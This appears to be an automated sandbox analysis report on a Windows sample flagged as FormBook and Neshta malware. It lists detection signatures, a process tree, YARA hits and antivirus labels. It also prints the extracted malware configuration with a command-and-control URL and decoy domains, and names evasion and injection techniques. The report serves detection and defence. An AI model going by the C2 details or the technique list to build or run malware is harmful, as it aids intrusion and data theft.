
Analysis Report vi0EwpbUht

Overview

General Information

Sample Name: vi0EwpbUht (renamed file extension from none to exe)
Analysis ID: 432848
MD5: f478c15f5affd8359762b8c6b0e913a4
SHA1: 05b36949abd35a132488158f38149c7b582c8d3a
SHA256: e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
Tags: exe, neshta

Detection

FormBook, Neshta
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Neshta
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • vi0EwpbUht.exe (PID: 7096 cmdline: 'C:\Users\user\Desktop\vi0EwpbUht.exe' MD5: F478C15F5AFFD8359762B8C6B0E913A4)
    • vi0EwpbUht.exe (PID: 6184 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: 4A10F66447AAF017229FF618AAB923E3)
      • vi0EwpbUht.exe (PID: 6372 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: 4A10F66447AAF017229FF618AAB923E3)
        • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.com (PID: 3728 cmdline: 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe' MD5: 713C9023AF9454658983BDEEC3B3F4D4)
            • elxhan.exe (PID: 1144 cmdline: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe MD5: 4A10F66447AAF017229FF618AAB923E3)
              • elxhan.exe (PID: 5572 cmdline: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe MD5: 4A10F66447AAF017229FF618AAB923E3)
          • NETSTAT.EXE (PID: 5948 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 4140 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • help.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.personalizedyardsigns.com/xkcp/"], "decoy": ["plcnotary.com", "pennywisebusiness.net", "negatzone.com", "hangclinic.com", "choice-home-warranty-review.com", "oslojistas.com", "keguanchina.com", "amazoncarbonhub.com", "myworkaccident.com", "shipu299.com", "henselectrlc.com", "store55588.com", "11ncbee.net", "reissantorini.com", "karta.gold", "goldenstatesurplus.net", "soslifefood.com", "bis-adapter.net", "harrywalia.com", "myboutiqueflowers.com", "rareearthmetalrefining.com", "triathletestrength.com", "jumtix.xyz", "shropshirepaddleboarding.com", "promocaomercadolivre.com", "tetratechinstruction.com", "emergingleadership.coach", "aresponsibleperson.net", "gethesspp.com", "zicanotes.com", "lance2375problems.com", "sxkeyuanda.com", "hotradio1.com", "dcsingersforhire.com", "shophigh5.com", "heaustralia.site", "bandlaser.com", "pucksbar.net", "financialdy.com", "digech.com", "livablelandbuyer.com", "bccluster.com", "xn--o39ay81ahtag62aba.com", "petalumaroofing.com", "handmadebyclydelle.com", "thecanineharness.com", "83twistleton.com", "shardulwakade.net", "shopcovetandcrave.com", "babateeconsult.com", "plancougar.com", "buyketoeasy.com", "dccustomcreation.com", "nutellajam.com", "kaiocarvalho.com", "treschicbeautyloft.com", "gofornye.com", "agileintelligence.coach", "poetryartists.com", "teailn.com", "letsreflectonline.net", "uggoutletosterreich.com", "metododgl.com", "centurygreatpath.info"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
vi0EwpbUht.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34

Dropped Files

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
107 entries in total.

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
38 entries in total.

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.elxhan.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.elxhan.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.elxhan.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.vi0EwpbUht.exe.400000.0.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
1.2.vi0EwpbUht.exe.400000.0.unpack | JoeSecurity_Neshta | Yara detected Neshta | Joe Security
37 entries in total.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: vi0EwpbUht.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Neshta.A
Found malware configuration
Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Metadefender: Detection: 91%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | ReversingLabs: Detection: 100%
Multi AV Scanner detection for submitted file
Source: vi0EwpbUht.exe | Metadefender: Detection: 91%
Source: vi0EwpbUht.exe | ReversingLabs: Detection: 100%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: vi0EwpbUht.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.vi0EwpbUht.exe.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 7.1.elxhan.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.NETSTAT.EXE.292ed78.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.svchost.com.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 3.1.vi0EwpbUht.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.elxhan.exe.22b0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.vi0EwpbUht.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.elxhan.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.NETSTAT.EXE.328f834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.vi0EwpbUht.exe.2ff0000.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.svchost.com.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.vi0EwpbUht.exe.400000.0.unpack | Avira: Label: W32/Neshta.A
Source: 4.0.explorer.exe.1183f834.74.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: vi0EwpbUht.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: netstat.pdbGCTL | source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb | source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

Spreading:

Yara detected Neshta
Source: Yara match | File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
